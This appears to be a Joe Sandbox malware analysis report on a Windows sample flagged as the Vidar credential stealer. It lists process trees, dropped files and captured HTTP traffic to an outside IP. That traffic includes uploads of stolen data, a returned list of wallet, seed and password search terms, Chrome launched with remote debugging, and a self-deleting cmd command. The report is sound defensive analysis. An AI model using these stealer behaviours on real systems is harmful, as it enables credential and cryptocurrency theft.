2025-03-15 07:29:48 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 32 76 73 32 36 66 33 65 75 61 31 76 33 37 39 30 68 76 61 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 30 37 66 64 31 31 37 63 65 35 64 61 37 37 30 30 61 66 64 66 63 37 62 30 39 32 66 37 31 34 30 0d 0a 2d 2d 2d 2d 2d 2d 32 76 73 32 36 66 33 65 75 61 31 76 33 37 39 30 68 76 61 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 35 34 32 35 62 66 39 31 38 31 65 36 63 31 33 32 61 61 62 39 66 65 39 64 35 64 62 62 30 61 66 0d 0a 2d 2d 2d 2d 2d 2d 32 76 73 32 36 66 33 65 75 61 31 76 33 37 39 30 68 76 61 73 0d 0a 43 6f 6e 74 Data Ascii: ------2vs26f3eua1v3790hvasContent-Disposition: form-data; name="token"607fd117ce5da7700afdfc7b092f7140------2vs26f3eua1v3790hvasContent-Disposition: form-data; name="build_id"95425bf9181e6c132aab9fe9d5dbb0af------2vs26f3eua1v3790hvasCont
2025-03-15 07:29:49 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 15 Mar 2025 07:29:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-03-15 07:29:49 UTC	1524	IN	Data Raw: 35 65 38 0d 0a 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e Data Ascii: 5e8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49775	95.217.30.53	443	7628	C:\Users\user\Desktop\Cm2GRjWK1C.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-15 07:29:50 UTC	179	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----47q16x47glfkfusjeuas Host: 95.217.30.53 Content-Length: 453 Connection: Keep-Alive Cache-Control: no-cache
2025-03-15 07:29:50 UTC	453	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 34 37 71 31 36 78 34 37 67 6c 66 6b 66 75 73 6a 65 75 61 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 30 37 66 64 31 31 37 63 65 35 64 61 37 37 30 30 61 66 64 66 63 37 62 30 39 32 66 37 31 34 30 0d 0a 2d 2d 2d 2d 2d 2d 34 37 71 31 36 78 34 37 67 6c 66 6b 66 75 73 6a 65 75 61 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 35 34 32 35 62 66 39 31 38 31 65 36 63 31 33 32 61 61 62 39 66 65 39 64 35 64 62 62 30 61 66 0d 0a 2d 2d 2d 2d 2d 2d 34 37 71 31 36 78 34 37 67 6c 66 6b 66 75 73 6a 65 75 61 73 0d 0a 43 6f 6e 74 Data Ascii: ------47q16x47glfkfusjeuasContent-Disposition: form-data; name="token"607fd117ce5da7700afdfc7b092f7140------47q16x47glfkfusjeuasContent-Disposition: form-data; name="build_id"95425bf9181e6c132aab9fe9d5dbb0af------47q16x47glfkfusjeuasCont
2025-03-15 07:29:51 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 15 Mar 2025 07:29:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-03-15 07:29:51 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49776	95.217.30.53	443	7628	C:\Users\user\Desktop\Cm2GRjWK1C.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-15 07:29:55 UTC	181	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----kn7q1vs2ny5x47y5pzmg Host: 95.217.30.53 Content-Length: 99109 Connection: Keep-Alive Cache-Control: no-cache
2025-03-15 07:29:55 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 6b 6e 37 71 31 76 73 32 6e 79 35 78 34 37 79 35 70 7a 6d 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 30 37 66 64 31 31 37 63 65 35 64 61 37 37 30 30 61 66 64 66 63 37 62 30 39 32 66 37 31 34 30 0d 0a 2d 2d 2d 2d 2d 2d 6b 6e 37 71 31 76 73 32 6e 79 35 78 34 37 79 35 70 7a 6d 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 35 34 32 35 62 66 39 31 38 31 65 36 63 31 33 32 61 61 62 39 66 65 39 64 35 64 62 62 30 61 66 0d 0a 2d 2d 2d 2d 2d 2d 6b 6e 37 71 31 76 73 32 6e 79 35 78 34 37 79 35 70 7a 6d 67 0d 0a 43 6f 6e 74 Data Ascii: ------kn7q1vs2ny5x47y5pzmgContent-Disposition: form-data; name="token"607fd117ce5da7700afdfc7b092f7140------kn7q1vs2ny5x47y5pzmgContent-Disposition: form-data; name="build_id"95425bf9181e6c132aab9fe9d5dbb0af------kn7q1vs2ny5x47y5pzmgCont
2025-03-15 07:29:55 UTC	16355	OUT	Data Raw: 73 56 75 37 45 4b 77 79 70 4f 42 30 49 36 48 76 56 62 7a 6b 38 76 7a 43 53 49 39 35 54 63 56 4f 4e 77 78 6c 63 2b 6f 79 4f 50 65 74 63 50 6c 56 4b 6e 57 6a 4e 31 62 38 75 74 74 44 48 46 63 51 56 4b 6d 47 6e 53 70 34 66 6c 35 31 61 39 35 50 54 72 62 6f 50 6f 6f 4f 34 53 2b 55 59 70 68 49 47 5a 43 76 6c 4e 6e 63 6f 79 77 36 64 51 4f 54 36 43 6b 44 68 6f 31 6b 47 66 4c 5a 69 71 76 74 4f 30 73 4f 53 4d 39 4d 38 6a 38 36 39 74 56 49 50 5a 6e 79 7a 70 56 46 76 46 69 30 55 55 56 5a 41 55 6c 4c 52 51 41 6c 46 4c 53 55 41 4a 52 53 30 55 78 69 55 55 74 46 49 42 4b 4b 58 46 4a 51 41 55 55 55 55 41 4a 52 53 30 6d 4b 41 43 69 69 69 6d 41 6c 4b 44 69 69 6b 70 33 47 50 33 6e 76 7a 52 38 68 37 59 2b 6c 4d 6f 6f 43 77 70 6a 42 2b 36 61 61 55 59 64 71 58 6d 6c 44 45 64 36 Data Ascii: sVu7EKwypOB0I6HvVbzk8vzCSI95TcVONwxlc+oyOPetcPlVKnWjN1b8uttDHFcQVKmGnSp4fl51a95PTrboPooO4S+UYphIGZCvlNncoyw6dQOT6CkDho1kGfLZiqvtO0sOSM9M8j869tVIPZnyzpVFvFi0UUVZAUlLRQAlFLSUAJRS0UxiUUtFIBKKXFJQAUUUUAJRS0mKACiiimAlKDiikp3GP3nvzR8h7Y+lMooCwpjB+6aaUYdqXmlDEd6
2025-03-15 07:29:55 UTC	16355	OUT	Data Raw: 46 47 4b 4c 49 64 79 50 47 44 30 70 43 4d 31 4a 69 6b 32 35 2f 38 41 31 30 57 48 63 6a 49 7a 54 63 59 46 53 59 2f 4f 67 6a 32 37 30 72 44 75 51 6b 55 33 46 54 45 59 4e 4d 49 70 57 4b 54 47 59 77 61 51 6a 30 70 35 7a 6d 6b 49 4e 4b 78 56 78 6e 53 6a 42 48 74 54 68 2f 6e 4e 47 44 2f 39 65 6e 59 64 78 75 50 70 52 6a 6e 2b 64 4f 78 36 30 68 48 46 46 67 75 4e 36 43 6a 41 4e 4f 77 4f 61 51 38 55 37 44 75 4e 78 53 55 38 30 33 46 46 68 6a 53 4b 50 7a 70 32 50 2f 31 30 30 39 65 74 4b 77 78 74 46 4c 52 53 73 4e 43 59 7a 54 66 70 54 69 4b 54 6a 74 33 71 52 6a 65 4d 30 68 35 70 78 48 34 30 6e 34 55 46 44 65 6e 2b 46 48 76 30 70 65 6e 61 6b 2b 6c 53 41 64 71 61 52 7a 36 30 37 70 53 47 6b 4e 43 64 61 54 48 36 30 70 36 30 68 34 2b 6c 42 52 33 74 52 58 42 78 48 2b 4e 53 Data Ascii: FGKLIdyPGD0pCM1Jik25/8A10WHcjIzTcYFSY/Ogj270rDuQkU3FTEYNMIpWKTGYwaQj0p5zmkINKxVxnSjBHtTh/nNGD/9enYdxuPpRjn+dOx60hHFFguN6CjANOwOaQ8U7DuNxSU803FFhjSKPzp2P/1009etKwxtFLRSsNCYzTfpTiKTjt3qRjeM0h5pxH40n4UFDen+FHv0penak+lSAdqaRz607pSGkNCdaTH60p60h4+lBR3tRXBxH+NS
2025-03-15 07:29:55 UTC	16355	OUT	Data Raw: 42 68 52 52 52 51 41 47 6b 6f 6f 6f 41 4b 53 6c 6f 6f 47 4a 52 52 52 51 41 55 55 6c 4c 78 51 78 68 78 53 55 74 4a 54 41 51 30 74 49 61 4b 42 68 52 52 52 51 41 55 6c 4c 6d 6b 6f 47 46 4a 53 30 6c 41 42 52 52 52 51 4d 53 69 69 69 67 42 4b 4b 4b 4b 59 42 53 55 55 55 44 43 69 69 69 67 42 44 52 53 30 6c 4d 59 47 6b 70 54 53 55 41 46 46 46 4a 51 4d 4b 4b 4b 4b 59 42 53 55 74 4a 51 41 55 55 6d 61 4b 59 77 6f 6f 6f 6f 47 4a 52 52 52 6d 69 77 42 53 55 5a 6f 6f 41 4b 4b 4b 4b 59 77 7a 52 6d 6b 6f 70 67 46 46 46 49 61 51 78 52 39 34 56 76 33 58 2f 48 79 33 30 48 38 68 58 50 67 2f 4d 4b 33 37 6e 2f 6a 34 62 36 4c 2f 41 43 46 59 31 50 69 51 4c 34 6b 52 55 63 55 55 6d 61 52 70 30 46 6f 70 4b 4b 59 43 6d 6b 6f 70 4b 41 43 6c 70 4b 4b 42 68 52 32 6f 6f 50 53 67 42 4b 4b Data Ascii: BhRRRQAGkoooAKSlooGJRRRQAUUlLxQxhxSUtJTAQ0tIaKBhRRRQAUlLmkoGFJS0lABRRRQMSiiigBKKKKYBSUUUDCiiigBDRS0lMYGkpTSUAFFFJQMKKKKYBSUtJQAUUmaKYwooooGJRRRmiwBSUZooAKKKKYwzRmkopgFFFIaQxR94Vv3X/Hy30H8hXPg/MK37n/j4b6L/ACFY1PiQL4kRUcUUmaRp0FopKKYCmkopKAClpKKBhR2ooPSgBKK
2025-03-15 07:29:55 UTC	16355	OUT	Data Raw: 42 6e 72 33 36 38 31 73 30 56 78 53 77 64 43 54 62 63 64 7a 35 32 47 59 34 71 45 56 47 4d 33 5a 62 47 5a 62 61 64 63 61 62 61 6d 43 77 6d 68 45 62 66 4d 30 56 78 41 6b 30 5a 59 63 62 74 72 71 51 47 78 78 6e 47 61 55 44 56 6e 31 47 57 39 4b 32 45 64 78 4b 79 50 4c 4b 62 63 54 46 35 46 47 42 49 42 4a 75 45 62 66 37 67 55 44 41 77 42 67 56 70 55 56 4d 73 46 51 6b 37 75 4a 55 4d 7a 78 55 49 38 71 6b 59 67 30 4b 57 53 65 33 75 62 69 39 65 53 35 74 6c 56 62 65 55 71 4d 70 68 69 77 50 54 6b 37 69 54 6b 38 6b 6e 6d 72 46 72 5a 58 39 6a 76 38 41 73 31 35 44 38 38 37 58 48 37 79 32 6a 66 79 35 47 35 4c 52 35 55 2b 57 53 51 4f 56 78 30 48 6f 4b 30 36 4b 66 31 4b 68 61 33 4b 4c 2b 30 38 58 65 2f 4f 7a 47 69 30 69 37 73 6a 75 73 62 38 77 79 50 4d 6b 38 6a 73 69 75 7a Data Ascii: Bnr3681s0VxSwdCTbcdz52GY4qEVGM3ZbGZbadcabamCwmhEbfM0VxAk0ZYcbtrqQGxxnGaUDVn1GW9K2EdxKyPLKbcTF5FGBIBJuEbf7gUDAwBgVpUVMsFQk7uJUMzxUI8qkYg0KWSe3ubi9eS5tlVbeUqMphiwPTk7iTk8knmrFrZX9jv8As15D887XH7y2jfy5G5LR5U+WSQOVx0HoK06Kf1Kha3KL+08Xe/OzGi0i7sjusb8wyPMk8jsiuz
2025-03-15 07:29:55 UTC	16355	OUT	Data Raw: 66 35 6c 53 79 2f 46 77 69 35 53 70 53 53 58 39 31 2f 35 47 66 52 52 52 58 57 63 67 55 55 55 55 41 46 46 46 46 41 42 52 58 57 51 65 41 72 36 34 74 6f 70 30 75 37 59 4c 49 67 63 41 37 73 34 49 7a 36 55 2f 38 41 34 56 37 71 50 2f 50 35 61 2f 6d 33 2b 46 63 50 39 70 59 58 2b 62 38 48 2f 6b 65 72 2f 59 6d 50 2f 77 43 66 66 34 72 2f 41 44 4f 51 6f 72 71 70 2f 41 64 2f 62 32 38 73 7a 58 56 71 56 6a 51 75 51 43 32 63 41 5a 39 4b 77 4e 52 30 36 34 30 79 37 61 32 75 45 77 79 39 44 32 59 65 6f 72 53 6c 6a 4b 46 61 58 4c 43 56 32 59 59 6a 4c 63 56 68 34 63 39 57 46 6c 38 6e 2b 54 4b 6c 46 46 46 64 52 77 68 52 52 52 51 41 55 55 55 55 41 46 46 46 4a 51 4d 4b 4b 4b 4b 41 43 69 6a 4a 6f 6f 41 4b 4b 4b 4b 41 43 69 6b 6f 6f 41 4d 30 55 55 55 41 46 46 46 46 41 42 52 52 52 Data Ascii: f5lSy/Fwi5SpSSX91/5GfRRRXWcgUUUUAFFFFABRXWQeAr64top0u7YLIgcA7s4Iz6U/8A4V7qP/P5a/m3+FcP9pYX+b8H/ker/YmP/wCff4r/ADOQorqp/Ad/b28szXVqVjQuQC2cAZ9KwNR0640y7a2uEwy9D2YeorSljKFaXLCV2YYjLcVh4c9WFl8n+TKlFFFdRwhRRRQAUUUUAFFFJQMKKKKACijJooAKKKKACikooAM0UUUAFFFFABRRR
2025-03-15 07:29:55 UTC	979	OUT	Data Raw: 69 53 34 38 73 52 2b 61 32 63 6c 74 6f 34 47 66 53 71 74 6e 72 32 73 61 64 64 54 33 56 6a 71 31 2f 62 58 46 77 53 5a 70 6f 4c 6c 30 65 51 6b 35 2b 59 67 35 50 50 50 4e 55 5a 5a 4a 4a 70 58 6c 6c 6b 61 53 52 32 4c 4f 37 6e 4a 59 6e 6b 6b 6e 75 61 45 68 74 6a 4b 36 33 77 44 65 54 51 61 6e 71 46 74 48 35 59 6a 75 4e 4e 75 78 49 54 45 70 62 41 67 6b 49 41 59 6a 63 6f 7a 31 77 52 6e 6a 4f 61 35 4b 70 6f 4c 69 65 31 6b 4d 6c 76 4e 4a 43 35 56 6b 4c 52 73 56 4a 56 68 67 6a 6a 73 51 53 43 50 51 30 4d 52 33 47 6b 33 30 6e 69 44 77 4a 64 61 44 44 4a 71 64 72 2f 5a 56 6f 39 77 66 4b 75 73 32 31 30 54 4d 44 74 6b 69 43 2f 65 4f 34 42 54 75 50 4b 6a 69 74 4d 33 63 2b 6a 36 52 72 56 6e 70 4e 78 4a 46 65 36 44 5a 32 39 75 6b 31 75 32 47 53 53 53 59 47 35 5a 53 4f 63 6c Data Ascii: iS48sR+a2clto4GfSqtnr2saddT3Vjq1/bXFwSZpoLl0eQk5+Yg5PPPNUZZJJpXllkaSR2LO7nJYnkknuaEhtjK63wDeTQanqFtH5YjuNNuxITEpbAgkIAYjcoz1wRnjOa5KpoLie1kMlvNJC5VkLRsVJVhgjjsQSCPQ0MR3Gk30niDwJdaDDJqdr/ZVo9wfKus210TMDtkiC/eO4BTuPKjitM3c+j6RrVnpNxJFe6DZ29uk1u2GSSSYG5ZSOcl
2025-03-15 07:29:56 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 15 Mar 2025 07:29:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-03-15 07:29:56 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49777	95.217.30.53	443	7628	C:\Users\user\Desktop\Cm2GRjWK1C.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-15 07:29:57 UTC	179	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----58glx4o8qq1dje3ec2n7 Host: 95.217.30.53 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2025-03-15 07:29:57 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 35 38 67 6c 78 34 6f 38 71 71 31 64 6a 65 33 65 63 32 6e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 30 37 66 64 31 31 37 63 65 35 64 61 37 37 30 30 61 66 64 66 63 37 62 30 39 32 66 37 31 34 30 0d 0a 2d 2d 2d 2d 2d 2d 35 38 67 6c 78 34 6f 38 71 71 31 64 6a 65 33 65 63 32 6e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 35 34 32 35 62 66 39 31 38 31 65 36 63 31 33 32 61 61 62 39 66 65 39 64 35 64 62 62 30 61 66 0d 0a 2d 2d 2d 2d 2d 2d 35 38 67 6c 78 34 6f 38 71 71 31 64 6a 65 33 65 63 32 6e 37 0d 0a 43 6f 6e 74 Data Ascii: ------58glx4o8qq1dje3ec2n7Content-Disposition: form-data; name="token"607fd117ce5da7700afdfc7b092f7140------58glx4o8qq1dje3ec2n7Content-Disposition: form-data; name="build_id"95425bf9181e6c132aab9fe9d5dbb0af------58glx4o8qq1dje3ec2n7Cont
2025-03-15 07:29:58 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 15 Mar 2025 07:29:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-03-15 07:29:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49778	95.217.30.53	443	7628	C:\Users\user\Desktop\Cm2GRjWK1C.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-15 07:29:58 UTC	179	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----h4o8gv3ozmozmymg4wtr Host: 95.217.30.53 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2025-03-15 07:29:58 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 68 34 6f 38 67 76 33 6f 7a 6d 6f 7a 6d 79 6d 67 34 77 74 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 30 37 66 64 31 31 37 63 65 35 64 61 37 37 30 30 61 66 64 66 63 37 62 30 39 32 66 37 31 34 30 0d 0a 2d 2d 2d 2d 2d 2d 68 34 6f 38 67 76 33 6f 7a 6d 6f 7a 6d 79 6d 67 34 77 74 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 35 34 32 35 62 66 39 31 38 31 65 36 63 31 33 32 61 61 62 39 66 65 39 64 35 64 62 62 30 61 66 0d 0a 2d 2d 2d 2d 2d 2d 68 34 6f 38 67 76 33 6f 7a 6d 6f 7a 6d 79 6d 67 34 77 74 72 0d 0a 43 6f 6e 74 Data Ascii: ------h4o8gv3ozmozmymg4wtrContent-Disposition: form-data; name="token"607fd117ce5da7700afdfc7b092f7140------h4o8gv3ozmozmymg4wtrContent-Disposition: form-data; name="build_id"95425bf9181e6c132aab9fe9d5dbb0af------h4o8gv3ozmozmymg4wtrCont
2025-03-15 07:29:59 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 15 Mar 2025 07:29:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-03-15 07:29:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	03:29:06
Start date:	15/03/2025
Path:	C:\Users\user\Desktop\Cm2GRjWK1C.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Cm2GRjWK1C.exe"
Imagebase:	0x280000
File size:	8'282'848 bytes
MD5 hash:	9A6088F8F1880AB2D28748FED448B4BC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.1286006933.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1678369352.00000000010A3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.1300135134.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.1300089487.00000000010B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.1285961370.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.1314253795.00000000010B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:29:29
Start date:	15/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:	0x7ff786830000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	03:29:29
Start date:	15/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2348,i,6494542625534998801,13089621614096395101,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2452 /prefetch:3
Imagebase:	0x7ff786830000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	03:29:58
Start date:	15/03/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\dba1d" & exit
Imagebase:	0xc70000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	03:29:59
Start date:	15/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff62fc20000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	03:29:59
Start date:	15/03/2025
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 11
Imagebase:	0x190000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Cm2GRjWK1C.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Protection of GUI

System Summary

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\dba1d\2dba1d

C:\ProgramData\dba1d\gdjmoz

C:\ProgramData\dba1d\jw4wb168q

C:\ProgramData\dba1d\ng4eus

C:\ProgramData\dba1d\ozuaim

C:\ProgramData\dba1d\vaim7g

C:\ProgramData\dba1d\w4wb168q1

C:\ProgramData\dba1d\x4wbi5

C:\ProgramData\dba1d\y58gl6

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\json[1].json

Chrome Cache Entry: 67

Chrome Cache Entry: 68

Windows Analysis Report
Cm2GRjWK1C.exe